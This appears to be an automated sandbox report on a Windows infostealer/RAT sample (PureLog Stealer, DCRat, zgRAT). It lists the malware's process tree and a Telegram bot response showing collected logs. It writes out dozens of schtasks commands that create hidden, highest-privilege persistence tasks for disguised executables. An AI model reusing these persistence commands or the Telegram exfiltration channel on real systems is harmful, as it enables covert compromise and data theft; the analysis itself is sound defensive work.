                                                                                                                                                                                            {"ok":true,"result":{"message_id":782,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735739535,"photo":[{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADcwADNgQ","file_unique_id":"AQADa6wxGwnNqUd4","file_size":1175,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADbQADNgQ","file_unique_id":"AQADa6wxGwnNqUdy","file_size":14843,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADeAADNgQ","file_unique_id":"AQADa6wxGwnNqUd9","file_size":62032,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDDmd1SI-gn93kywqupbRy0btIYXh9AAJrrDEbCc2pR7mB-S0yNswzAQADAgADeQADNgQ","file_unique_id":"AQADa6wxGwnNqUd-","file_size":91808,"width":1280,"height":1024}],"caption":"Log collected\nID: 62fbcdc10f797f06ab2 [TRUNCATED]


                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:08:51:52
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Users\user\Desktop\YGk3y6Tdix.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\YGk3y6Tdix.exe"
                                                                                                                                                                                            Imagebase:0xfa0000
                                                                                                                                                                                            File size:2'312'934 bytes
                                                                                                                                                                                            MD5 hash:E38B0FC914530E6682D067159B0C7C34
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                            Start time:08:51:52
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"
                                                                                                                                                                                            Imagebase:0x7a0000
                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:08:51:54
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "
                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:08:51:54
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:08:51:54
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\/Drivers/fontdrvhost.exe"
                                                                                                                                                                                            Imagebase:0xb80000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 73%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                            Start time:08:51:57
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:08:51:58
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:08:51:59
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            Imagebase:0x740000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 73%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:08:51:59
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            Imagebase:0xf90000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:08:51:59
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            Imagebase:0x1f0000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                            Start time:08:51:59
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:08:52:02
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"
                                                                                                                                                                                            Imagebase:0x7ff733fa0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:08:52:02
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:08:52:02
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                                                            Imagebase:0x7ff6553d0000
                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:08:52:03
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:ping -n 10 localhost
                                                                                                                                                                                            Imagebase:0x7ff7e2ed0000
                                                                                                                                                                                            File size:22'528 bytes
                                                                                                                                                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:08:52:12
                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                            Path:C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                                                                                                                                                                            Imagebase:0x740000
                                                                                                                                                                                            File size:1'991'168 bytes
                                                                                                                                                                                            MD5 hash:BA58757137700B6B304B45298D986EB1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 73%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:9.4%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:9.4%
                                                                                                                                                                                              Total number of Nodes:1511
                                                                                                                                                                                              Total number of Limit Nodes:43
